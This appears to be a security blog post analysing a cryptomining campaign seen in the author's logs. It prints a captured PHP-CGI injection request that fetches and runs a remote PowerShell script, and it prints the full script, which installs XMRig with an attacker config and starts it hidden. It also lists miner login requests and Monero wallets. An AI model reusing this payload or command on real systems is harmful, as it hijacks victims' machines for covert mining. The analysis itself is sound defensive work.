Skip to main content
  1. Articles/

The rick and morty XMR and other crytominer.

·940 words·
Crytominer Investigation
Author
Shoggoth Industries
Table of Contents

The rick and morty XMR and other crytominer.
#

Around the beginning of January an IP (87.120.125.13) made a request with the following content.

 /cgi-bin/php-cgi.exe?arg=
Content-Type: text/plain

<?php system('powershell.exe -Command "& {iwr -Uri http://xxx.xxx.xxx/script.ps1 -OutFile script.ps1; ./script.ps1}"');?> HTTP/1.1" 

The content of the scrit that was tempted to download is as follows

# Set Execution Policy
Set-ExecutionPolicy -Scope CurrentUser -ExecutionPolicy Unrestricted

# Variables
$xmrigUrl = "https://github.com/xmrig/xmrig/releases/download/v6.22.2/xmrig-6.22.2-msvc-win64.zip"
$configUrl = "https://evilbit.pro/config.json"
$oastUri = "http://jnkmfjqcorurgzffkisbf61r0lluhxxxz.oast.fun"
$downloadPath = "$env:USERPROFILE\Downloads\xmrig.zip"
$installPath = "C:\xmrig"
$walletAddress = "45Lu4Zzcp64etdoVnc9jSU84WBygC7p5mdrowZic6LVDZERsDszFgcRcF63Gm6kVc7XsvgpvhH36SNfCmUAb1TwbSG7PVTa"
$poolUrl = "pool.supportxmr.com:443"
$workerName = "MyWorker"

# Download XMRig
Write-Host "Downloading XMRig..."
Invoke-WebRequest -Uri $xmrigUrl -OutFile $downloadPath -UseBasicParsing

# Extract XMRig
Write-Host "Extracting XMRig..."
Add-Type -AssemblyName System.IO.Compression.FileSystem
[System.IO.Compression.ZipFile]::ExtractToDirectory($downloadPath, $installPath)

# Download config.json
Write-Host "Downloading config.json..."
$configPath = Join-Path $installPath "xmrig-6.22.2\config.json"
Invoke-WebRequest -Uri $configUrl -OutFile $configPath -UseBasicParsing

# Make GET request to the specified URI
Write-Host "Making GET request to the URI..."
Invoke-WebRequest -Uri $oastUri -UseBasicParsing | Out-Null

# Start XMRig in a hidden window
Write-Host "Starting XMRig in a hidden window..."
$xmrigExe = Join-Path $installPath "xmrig-6.22.2\xmrig.exe"
Start-Process -FilePath $xmrigExe -ArgumentList "--config=$configPath" -WindowStyle Hidden

Write-Host "XMRig has started mining in a hidden window! Use Task Manager to stop it if needed."

We could observe that one of the elements that doesn’t seem standard is the following URL: “https://evilbit.pro/config.json"

An analysis revealed several interesting elements related to the Evilbit cryptocurrency:

Key points:

  • Two users with pseudonyms linked to Rick and Morty
  • A website promoting the Evilbit cryptocurrency
  • A connection to a cryptominer

It’s interesting to note that these elements seem to be linked to a discussion on a Bitcoin forum:

evilmortyy and r1ckpr0 are both present in these discussions, which starts to confirm the fact that it’s actually only one person behind these two accounts.

We don’t have time for a full investigation, if we find time we’ll modify this article to improve it and add elements

The other Xmrig sections
#

Towards the end of January, we began to see interesting requests with references to a cryto-miner,

ipdaterequest
185.213.175.17119/Jan/2025:19:31:12{ id :1, jsonrpc : 2.0 , method : login , params :{ login : 49PybvnVss4jhuo7AxfL2TU1CbMXt2qJVhnVPqoys2qxcr2iMwJrCKoSfgAuoxYo6jToQfHpbeREMWKBLApcuCESSDgecfZ , pass : x , agent : XMRig/6.15.3 (Windows NT 10.0; Win64; x64) libuv/1.42.0 msvc/2019 , algo :[ cn/1 , cn/2 , cn/r , cn/fast , cn/half , cn/xao , cn/rto , cn/rwz , cn/zls , cn/double , cn/ccx , cn-lite/1 , cn-heavy/0 , cn-heavy/tube , cn-heavy/xhv , cn-pico , cn-pico/tlo , cn/upx2 , rx/0 , rx/wow , rx/arq , rx/graft , rx/sfx , rx/keva , argon2/chukwa , argon2/chukwav2 , argon2/ninja , astrobwt ]}}
185.213.175.17121/Jan/2025:19:21:17{ id :1, jsonrpc : 2.0 , method : login , params :{ login : 45ygML2DygAWWzMCBLEN56DCyrCNH2NbRJPPFkaXWULKS5PvSsVosji9i9QZKwvfSNhFVnc8PrjDRbg948UPW3fzVdoLbzH , pass : x , agent : XMRig/6.15.3 (Windows NT 10.0; Win64; x64) libuv/1.42.0 msvc/2019 , algo :[ cn/1 , cn/2 , cn/r , cn/fast , cn/half , cn/xao , cn/rto , cn/rwz , cn/zls , cn/double , cn/ccx , cn-lite/1 , cn-heavy/0 , cn-heavy/tube , cn-heavy/xhv , cn-pico , cn-pico/tlo , cn/upx2 , rx/0 , rx/wow , rx/arq , rx/graft , rx/sfx , rx/keva , argon2/chukwa , argon2/chukwav2 , argon2/ninja , astrobwt ]}}
185.91.69.11022/Jan/2025:19:48:22{ id :1, jsonrpc : 2.0 , method : login , params :{ login : 43TjhWZp2toWPLdTVQn3KJ6fbwjcSpuSZRzezU4Fnbzmdv3NJRKZkMJLt5wJCfNo5D1ne5wFYEPqaThtcthjWH5ZFAzD6y2 , pass : x , agent : XMRig/6.15.3 (Windows NT 10.0; Win64; x64) libuv/1.42.0 msvc/2019 , algo :[ cn/1 , cn/2 , cn/r , cn/fast , cn/half , cn/xao , cn/rto , cn/rwz , cn/zls , cn/double , cn/ccx , cn-lite/1 , cn-heavy/0 , cn-heavy/tube , cn-heavy/xhv , cn-pico , cn-pico/tlo , cn/upx2 , rx/0 , rx/wow , rx/arq , rx/graft , rx/sfx , rx/keva , argon2/chukwa , argon2/chukwav2 , argon2/ninja , astrobwt ]}}
185.91.69.11022/Jan/2025:19:48:22{ id :1, jsonrpc : 2.0 , method : login , params :{ login : 43TjhWZp2toWPLdTVQn3KJ6fbwjcSpuSZRzezU4Fnbzmdv3NJRKZkMJLt5wJCfNo5D1ne5wFYEPqaThtcthjWH5ZFAzD6y2 , pass : x , agent : XMRig/6.15.3 (Windows NT 10.0; Win64; x64) libuv/1.42.0 msvc/2019 , algo :[ cn/1 , cn/2 , cn/r , cn/fast , cn/half , cn/xao , cn/rto , cn/rwz , cn/zls , cn/double , cn/ccx , cn-lite/1 , cn-heavy/0 , cn-heavy/tube , cn-heavy/xhv , cn-pico , cn-pico/tlo , cn/upx2 , rx/0 , rx/wow , rx/arq , rx/graft , rx/sfx , rx/keva , argon2/chukwa , argon2/chukwav2 , argon2/ninja , astrobwt ]}}
195.170.172.12826/Jan/2025:09:29:34{ id :1, jsonrpc : 2.0 , method : login , params :{ login : 43fRm2LCtZ4ULu4wDTRpawa4wBrvv8EBgNw6zvZ1brKwRxwGSeorgdZjEXeWDhxwavcMYyq8GTpWs4eZ7H9dAVPvFYt3hzD , pass : x , agent : XMRig/6.15.3 (Windows NT 10.0; Win64; x64) libuv/1.42.0 msvc/2019 , algo :[ cn/1 , cn/2 , cn/r , cn/fast , cn/half , cn/xao , cn/rto , cn/rwz , cn/zls , cn/double , cn/ccx , cn-lite/1 , cn-heavy/0 , cn-heavy/tube , cn-heavy/xhv , cn-pico , cn-pico/tlo , cn/upx2 , rx/0 , rx/wow , rx/arq , rx/graft , rx/sfx , rx/keva , argon2/chukwa , argon2/chukwav2 , argon2/ninja , astrobwt ]}}
185.91.69.11026/Jan/2025:09:23:27{ id :1, jsonrpc : 2.0 , method : login , params :{ login : 45NUAgtBMGZZAYKEciGqYXYaRGvW8KBJRFveeWNEokSJ9oswC3hQoaJdBF9H87wPePUdBtND1soe3MADtfsMnQ9pEjhCNKZ , pass : x , agent : XMRig/6.15.3 (Windows NT 10.0; Win64; x64) libuv/1.42.0 msvc/2019 , algo :[ cn/1 , cn/2 , cn/r , cn/fast , cn/half , cn/xao , cn/rto , cn/rwz , cn/zls , cn/double , cn/ccx , cn-lite/1 , cn-heavy/0 , cn-heavy/tube , cn-heavy/xhv , cn-pico , cn-pico/tlo , cn/upx2 , rx/0 , rx/wow , rx/arq , rx/graft , rx/sfx , rx/keva , argon2/chukwa , argon2/chukwav2 , argon2/ninja , astrobwt ]}}

Monero wallet requested
#

49PybvnVss4jhuo7AxfL2TU1CbMXt2qJVhnVPqoys2qxcr2iMwJrCKoSfgAuoxYo6jToQfHpbeREMWKBLApcuCESSDgecfZ 45ygML2DygAWWzMCBLEN56DCyrCNH2NbRJPPFkaXWULKS5PvSsVosji9i9QZKwvfSNhFVnc8PrjDRbg948UPW3fzVdoLbzH 43TjhWZp2toWPLdTVQn3KJ6fbwjcSpuSZRzezU4Fnbzmdv3NJRKZkMJLt5wJCfNo5D1ne5wFYEPqaThtcthjWH5ZFAzD6y2 43fRm2LCtZ4ULu4wDTRpawa4wBrvv8EBgNw6zvZ1brKwRxwGSeorgdZjEXeWDhxwavcMYyq8GTpWs4eZ7H9dAVPvFYt3hzD 45NUAgtBMGZZAYKEciGqYXYaRGvW8KBJRFveeWNEokSJ9oswC3hQoaJdBF9H87wPePUdBtND1soe3MADtfsMnQ9pEjhCNKZ

Related

Monthly report: January 2025
·43686 words
Repport Monthly